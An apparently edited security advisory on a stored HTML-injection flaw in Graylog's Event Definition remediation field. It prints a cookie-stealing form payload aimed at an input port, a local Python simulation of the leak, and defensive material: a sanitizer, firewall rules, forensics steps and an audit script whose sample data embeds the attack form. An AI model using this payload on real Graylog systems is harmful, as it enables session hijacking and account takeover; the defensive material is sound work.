How the CVE Works
The vulnerability (CVE-2025-XXXX) in Graylog is an HTML injection in the Remediation Step field of Event Definitions, caused by insufficient sanitization of user-supplied HTML. An attacker who holds permission to create event definitions can store an HTML form in that field, and Graylog renders it unsanitized to any other user with permission to view alerts. The form itself cannot read cookies (it is markup, not script), and it does not need to: the attack points the form at an active Graylog input (for example an HTTP, raw TCP or syslog input) on the same host. Browser cookies are scoped to a host, not to a port, so when the victim submits the form the browser attaches the Graylog session cookie to the POST, and a raw input stores the whole request, Cookie header included, as a message the attacker can then read. With the session token in hand the attacker can take over the victim's account.
DailyCVE Form
Platform: Graylog
Version: <=6.0.13, 6.1.0-6.1.9
Vulnerability: Stored XSS (HTML form injection)
Severity: High
Date: May 7, 2025
What Undercode Say:
Exploitation:
1. Craft Malicious Payload:
<form action="http://graylog.example:5555/" method="POST">
  <input type="hidden" name="note" value="remediation">
  <button type="submit">Acknowledge remediation</button>
</form>
(graylog.example and port 5555 are placeholders for the Graylog host and the port of an input whose messages the attacker can read. A hidden field with value="document.cookie", as in the original write-up, only sends that literal string: HTML cannot read cookies, and the field is not needed because the browser attaches the cookie itself.)
2. Inject via Event Definition:
Submit the payload in the Remediation Step field of a new Event Definition.
3. Trigger Execution:
When a victim opens the alert and submits the form, the browser POSTs to the input port and attaches the Graylog session cookie, because cookies are host-scoped rather than port-scoped; the input stores the raw request, Cookie header and all. Plain HTML cannot auto-submit, so the attacker relies on the victim clicking a button that looks like a legitimate remediation action. If the session cookie carries the Secure flag and the input is plain HTTP, the browser withholds it and the attack fails.
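The following is an added, local simulation of the step above; it is not code from the original post or from Graylog. A socket on 127.0.0.1 stands in for a raw TCP input (which stores whatever bytes reach its port as a message) and http.client stands in for the victim's browser, which attaches every cookie scoped to the Graylog host to a request on any port of that host. The cookie name "authentication" and its value are constructed for the demo.

```python
"""Simulate why a form posted to a raw TCP input leaks the session cookie.

Added example, not Graylog code. The cookie below is constructed; in a real
attack the browser supplies the victim's live Graylog session cookie.
"""
import http.client
import socket
import threading
import urllib.parse
from typing import Optional

# Constructed session cookie for the demo (not a real token).
FAKE_SESSION = "authentication=5b9a0f2c-demo-session-token"


def start_raw_tcp_input(captured: list) -> tuple:
    """Stand-in for a raw TCP input: accept one connection, record every byte
    until the client closes, then append the bytes to `captured`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # OS-assigned port, like any input port
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.settimeout(5)
        chunks = []
        try:
            while True:
                chunk = conn.recv(4096)
                if not chunk:           # client closed: request fully received
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
        captured.append(b"".join(chunks))
        conn.close()
        srv.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return port, thread


def browser_submits_form(port: int, cookie_header: str) -> None:
    """Play the victim's browser: POST the injected form to the input port and
    attach the host's cookies, exactly as a browser does regardless of port."""
    body = urllib.parse.urlencode({"note": "remediation"})
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("POST", "/", body=body, headers={
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookie_header,
    })
    conn.close()   # a raw input never answers; the browser just shows an error


def extract_cookie_header(raw_request: bytes) -> Optional[str]:
    """What the attacker reads out of the stored message: the Cookie header."""
    for line in raw_request.decode("latin-1").split("\r\n"):
        if line.lower().startswith("cookie:"):
            return line.split(":", 1)[1].strip()
    return None


def simulate_leak() -> dict:
    """Run input and browser together; return the stored message and the cookie
    an attacker would recover from it."""
    captured: list = []
    port, thread = start_raw_tcp_input(captured)
    browser_submits_form(port, FAKE_SESSION)
    thread.join(timeout=5)
    message = captured[0] if captured else b""
    return {"port": port, "message": message,
            "leaked_cookie": extract_cookie_header(message)}


if __name__ == "__main__":
    result = simulate_leak()
    print(f"input on port {result['port']} stored {len(result['message'])} bytes")
    print("attacker recovers:", result["leaked_cookie"])
```

The stored message begins with the request line and headers, so the attacker simply searches the input's messages for "Cookie:". Nothing in the form body matters; the leak is a property of how browsers scope cookies.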
Detection:
grep -r "unsafeHTML" /graylog/web/   # heuristic: search the deployed web bundle for the unsanitized-HTML rendering path (path and string are this write-up's guesses; adjust to your install)
The reliable check is the running version: any 6.0.x release up to 6.0.13, or 6.1.0 through 6.1.9, is affected. Beyond that, review every existing Event Definition's Remediation Step field for HTML, in particular <form> elements whose action points at the Graylog host on a port other than the web interface, or at an external host.
Mitigation:
1. Patch Immediately: Upgrade to Graylog 6.0.14 or 6.1.10, the first fixed release of each branch.
2. Input Validation (defence in depth where you render this field yourself; the actual fix ships in the Graylog release). DOMPurify's default allow-list keeps <form>, <input> and the action attribute, so they must be forbidden explicitly:
import DOMPurify from 'dompurify';
function sanitizeHTML(input) {
  // Strip forms and active content outright; a remediation note never needs them.
  return DOMPurify.sanitize(input, {
    FORBID_TAGS: ['form', 'input', 'button', 'script', 'iframe', 'object', 'embed'],
    FORBID_ATTR: ['action', 'formaction'],
  });
}
3. Network Controls: the exfiltration path needs the victim's browser to reach an input port, so restrict input ports to the log sources that feed them. Do not drop port 9000: that is the Graylog web interface and API, and dropping it takes down the UI for everyone while leaving the inputs reachable.
iptables -A INPUT -p tcp --dport 5555 -s 10.10.0.0/16 -j ACCEPT   # log-source network
iptables -A INPUT -p tcp --dport 5555 -j DROP                       # everyone else, including user workstations
(5555 and 10.10.0.0/16 are placeholders for your raw/TCP input port and log-source subnet; repeat per input.)
Forensics:
grep "EventDefinition" /var/log/graylog/server.log   # audit event definition activity
The definitions themselves are the primary evidence: export them and inspect each Remediation Step field for injected HTML, noting creator and creation time. Then search the messages received by the inputs named in any injected form for a "Cookie:" header; a hit shows the form was actually submitted, and the session token in it identifies the affected user, whose sessions should be invalidated.
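An added audit script serving both the Detection and Forensics steps above (run it over the live definition list to detect, or over an exported or backed-up set to reconstruct what was injected). It is not code from the original post or from Graylog. Two assumptions to verify against your install: definitions are listed by GET /api/events/definitions and each one carries the remediation text in a field named "remediation_steps"; SAMPLE_RESPONSE is constructed in that shape and should be replaced by the live JSON.

```python
"""Audit event definitions for HTML injected into the remediation step.

Added example, not Graylog code. Assumed API shape: {"event_definitions":
[{"id": ..., "title": ..., "remediation_steps": "<html or text>"}, ...]}.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags that have no business in a remediation note.
DANGEROUS_TAGS = {"form", "script", "iframe", "object", "embed", "base", "meta", "svg"}
# Ports where a request from the victim's browser is expected; anything else on
# the Graylog host is most likely an input listening for the leaked cookie.
GRAYLOG_WEB_PORTS = {80, 443, 9000}


class RemediationAudit(HTMLParser):
    """Collect findings while walking the HTML of one remediation field."""

    def __init__(self, graylog_host: str):
        super().__init__()
        self.graylog_host = graylog_host.lower()
        self.findings: list = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)                     # HTMLParser lowercases names
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> tag present")
        for name in attrs:
            if name.startswith("on"):           # onclick=, onload=, ...
                self.findings.append(f"event handler {name}= on <{tag}>")
        target = attrs.get("action") or attrs.get("formaction")
        if target:
            self.findings.extend(self.classify_target(target))

    def classify_target(self, url: str) -> list:
        """Flag form targets that would carry the cookie to an input or off-host."""
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        port = parts.port or (443 if parts.scheme == "https" else 80)
        if host == self.graylog_host and port not in GRAYLOG_WEB_PORTS:
            return [f"form posts to the Graylog host on port {port}: "
                    "the browser will attach the session cookie to that request"]
        if host and host != self.graylog_host:
            return [f"form posts to external host {host}"]
        return []


def audit_definitions(api_response: dict, graylog_host: str) -> list:
    """Return one record per definition whose remediation HTML raised findings."""
    hits = []
    for definition in api_response.get("event_definitions", []):
        parser = RemediationAudit(graylog_host)
        parser.feed(definition.get("remediation_steps") or "")
        parser.close()
        if parser.findings:
            hits.append({"id": definition.get("id"),
                         "title": definition.get("title"),
                         "findings": parser.findings})
    return hits


# Constructed sample in the assumed API shape: one benign note, one cookie-
# stealing form aimed at an input port, one event-handler injection.
SAMPLE_RESPONSE = {
    "event_definitions": [
        {"id": "def-1", "title": "Disk usage high",
         "remediation_steps": "1. Check <code>df -h</code><br>2. Rotate logs"},
        {"id": "def-2", "title": "Failed logins",
         "remediation_steps": (
             '<form action="http://graylog.example:5555/" method="POST">'
             '<input type="hidden" name="note" value="remediation">'
             '<button type="submit">Acknowledge remediation</button></form>')},
        {"id": "def-3", "title": "Brute force",
         "remediation_steps": '<a href="#" onclick="alert(1)">Open runbook</a>'},
    ]
}


if __name__ == "__main__":
    for hit in audit_definitions(SAMPLE_RESPONSE, "graylog.example"):
        print(hit["id"], hit["title"])
        for finding in hit["findings"]:
            print("   -", finding)
```

Pass the hostname users type into their browser as graylog_host; a form that targets that host on a non-web port is the signature of this attack, while a form targeting any other host is ordinary phishing through the same field.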
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVE Details: CVE-2025-XXXX
Sources:
Reported By: github.com
Extra Source Hub:
Undercode